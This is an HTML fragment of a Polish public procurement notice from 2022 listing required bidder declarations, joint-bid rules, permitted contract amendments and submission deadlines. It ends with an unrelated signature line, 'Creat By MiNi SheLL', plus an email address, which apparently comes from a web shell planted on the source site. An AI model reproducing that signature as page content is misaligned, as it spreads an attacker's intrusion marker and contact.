Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">PODMIOTOWE ŚRODKI DOWODOWE DOKUMENTY SKŁADANE WRAZ Z OFERTĄ:<br/>a) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu stanowiące Załącznik nr<br/>2.<br/>b) Oświadczenie, o którym mowa w pkt 1, stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w<br/>postępowaniu, odpowiednio na dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki<br/>dowodowe.<br/>c) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, o którym mowa wyżej składa każdy z<br/>wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie te potwierdzają brak podstaw wykluczenia oraz spełnienie<br/>warunków udziału w postępowaniu zakresie, w jakim każdy wykonawca wykazuje spełnienie warunków udziału.<br/>d) Jeżeli Wykonawca powołuje się na zasoby podmiotów trzecich w celu wykazania spełniania warunków udziału w postępowaniu,<br/>to składa wraz z ofertą: zobowiązanie podmiotu trzeciego do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>wykonania zamówienia (wg. Załącznika nr 6) oraz oświadczenie podmiotu udostępniające zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnienie warunków udziału w postępowaniu, w zakresie, jakim Wykonawca powołuje<br/>się na jego zasoby (wg. Załącznika nr 3).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych potwierdzających:<br/>POTWIERDZAJĄCE BRAK PODSTAW WYKLUCZENIA:<br/>a) oświadczenie, w zakresie art. 108 ust.1 pkt. 5 ustawy Pzp o braku przynależności do tej samej grupy kapitałowej w rozumieniu<br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego wykonawcy należącego do tej grupy<br/>kapitałowej (wg. wzoru Załącznik nr 5) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie składa<br/>każdy z wykonawców wspólnie ubiegający się o zamówienie,<br/>POTWIERDZAJĄCE SPEŁNIENIE WARUNKÓW UDZIAŁU W POSTĘPOWANIU:<br/>Ogłoszenie nr 2022/BZP 00248986/01 z dnia 2022-07-11<br/>2022-07-11 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>a) wykaz dostaw, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te<br/>dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego dostawy zostały wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonane, a<br/>jeżeli wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie<br/>powinny być wystawione w okresie ostatnich 3 miesięcy – wg. Załącznika nr 6.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Oferta wraz z załącznikami:<br/>a) Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>b) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>c) oświadczenie wg. załącznika nr 2 do SWZ;<br/>d) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców lub w przypadku polegania na zdolności<br/>podmiotów udostępniających zasoby oświadczenie wg. załącznika nr 2 do SWZ, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp składa każdy z Wykonawców oraz podmiot udostępniający; zasoby;<br/>e) zobowiązanie podmiotu udostępniającego zasoby i oświadczenie wg załącznika nr 3 do SWZ – jeśli dotyczy;<br/>f)Materiały równoważne muszą być sporządzona w języku polskim, w postaci elektronicznej w formacie danych: pdf, doc,<br/>docx, rtf, xps, odt i opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>Dokumenty te powinny być podpisane przez osobę upoważnioną do re reprezentowania wykonawcy, zgodnie z formą<br/>reprezentacji wykonawcy, określoną w rejestrze lub innym dokumencie, właściwym dla danej formy<br/>organizacyjnej wykonawcy, albo przez umocowanego przedstawiciela wykonawcy<br/>2) Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, sporządzone w języku obcym przekazuje się wraz<br/>z tłumaczeniem na język polski (w razie wątpliwości uznaje się, iż wersja polskojęzyczna jest wersją wiążącą).<br/>3) W przypadku pozostałych dokumentów i oświadczeń, o których mowa w pkt. XI.2 i 3 SWZ, Zamawiający wezwie<br/>wykonawcę, którego oferta została najwyżej oceniona do ich złożenia w wyznaczonym, nie krótszym niż 5 dni terminie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:<br/>a) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane do realizacji których te zdolności są wymagane.<br/>b) W przypadku, o którym mowa w pkt. a), wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi lub dostawy lub roboty budowlane wykonają poszczególni wykonawcy.<br/>c) warunek opisany w pkt. 4.1 zostanie spełniony, jeżeli jeden z wykonawców będzie posiadał wymagane doświadczenie lub<br/>będą spełniać łącznie<br/>d) warunek opisany w pkt. 4.2 zostanie spełniony, jeżeli jeden z wykonawców będzie dysponował wymaganymi osobami lub<br/>Wykonawcy będą wspólnie dysponowali tymi osobami.<br/>e) Wykonawcy, o których mowa w pkt. 5, ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie<br/>Ogłoszenie nr 2022/BZP 00248986/01 z dnia 2022-07-11<br/>2022-07-11 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>zabezpieczenia należytego wykonania umowy.<br/>f) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, których oferta wspólna zostanie najwyżej<br/>oceniona, są oni zobowiązani na wezwanie Zamawiającego złożyć podmiotowe środki dowodowe, o których mowa w<br/>Rozdziale XI. pkt. 2 SWZ potwierdzające brak podstaw wykluczenia, przy czym w zakresie potwierdzającym spełnienie<br/>warunków udziału składa odpowiednio wykonawca/wykonawcy, który/którzy wykazuje/-ą spełnienie warunku udziału. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zgodnie z art. 455 ust. 1 ustawy Prawo zamówień publicznych przewiduje dopuszczalne zmiany umowy bez<br/>przeprowadzenia nowego postępowania o udzielenie zamówienia.<br/>1.Zmiana umowy może nastąpić w przypadkach:<br/>1)określonych w art. 455 ustawy Prawo zamówień publicznych,<br/>2)przewidzianych w niniejszej umowie.<br/>2.Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.<br/>3.Zmiany terminu wykonania przedmiotu zamówienia, w następujących sytuacjach:<br/>a) wystąpienie siły wyższej tj. działania i zamieszki wojenne, ataki terrorystyczne, klęski żywiołowe spowodowane przez<br/>burze, huragany, tajfuny, trzęsienia ziemi, ekonomiczne następstwa globalnego kryzysu finansowego i inne,<br/>b) wystąpienia uniemożliwiającego kontynuowanie robót: warunków atmosferycznych; warunków geotechnicznych;<br/>warunków geologicznych; warunków wodnych; warunków hydrologicznych; warunków odmiennych od przyjętych w<br/>dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót; warunków terenowych w szczególności<br/>istnienie podziemnych urządzeń, instalacji, fragmentów budowli, obiektów infrastrukturalnych lub ich części; a także<br/>wystąpienie pożaru,<br/>c) wystąpienie w trakcie wykonywania zamówienia odkrycia, co do którego istnieje przypuszczenie, iż jest ono związane z<br/>zabytkiem lub uzasadnione będzie zawiadomienie konserwatora zabytków w celu dokonania oględzin odkrycia lub w razie<br/>potrzeby, zorganizowania badania archeologicznego,<br/>d) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działanie nie są konsekwencją winy<br/>któregokolwiek ze stron,<br/>e) z powodu wystąpienia dodatkowych robót, a niemożliwych do przewidzenia przed zawarciem umowy przez<br/>doświadczonego wykonawcę oraz również w przypadku wystąpienia wypadków drogowych powstałych w strefie robót,<br/>Fakty powyższe muszą być zgłoszone przez Wykonawcę pisemnie wraz z uzasadnieniem i zatwierdzone przez<br/>Zamawiającego. Strony ustalą nowy termin, który zostanie wprowadzony aneksem do umowy. Podstawą do ustalenia<br/>nowego terminu jest czas trwania przeszkód uniemożliwiających prawidłowe wykonanie robót.<br/>Uwaga:<br/>Jakakolwiek przerwa w realizacji przedmiotu umowy wynikła z działań lub braku działań Podwykonawcy będzie traktowana<br/>jako przerwa wynikła z przyczyn zależnych od Wykonawcy i nie może stanowić podstawy do zmiany terminu zakończenia<br/>robót.<br/>5. Zamawiający dopuszcza możliwość wprowadzania zmian do zawartej umowy w przypadkach i na warunkach<br/>przewidzianych w art. 15r ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem,<br/>przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (Dz. U.<br/>z 2020r poz. 374 ze zm.).<br/>6. Zmiany (modyfikacja) złożonych w postępowaniu deklaracji odnośnie do podwykonawstwa poprzez:<br/>a) wskazanie innych podwykonawców,<br/>b) rezygnację z podwykonawców,<br/>c) wskazanie innego zakresu podwykonawstwa,<br/>d) wykonanie zamówienia przy pomocy podwykonawców, pomimo niewskazania w postępowaniu żadnej części zamówienia<br/>przeznaczonej do wykonania w ramach podwykonawstwa, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-27 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com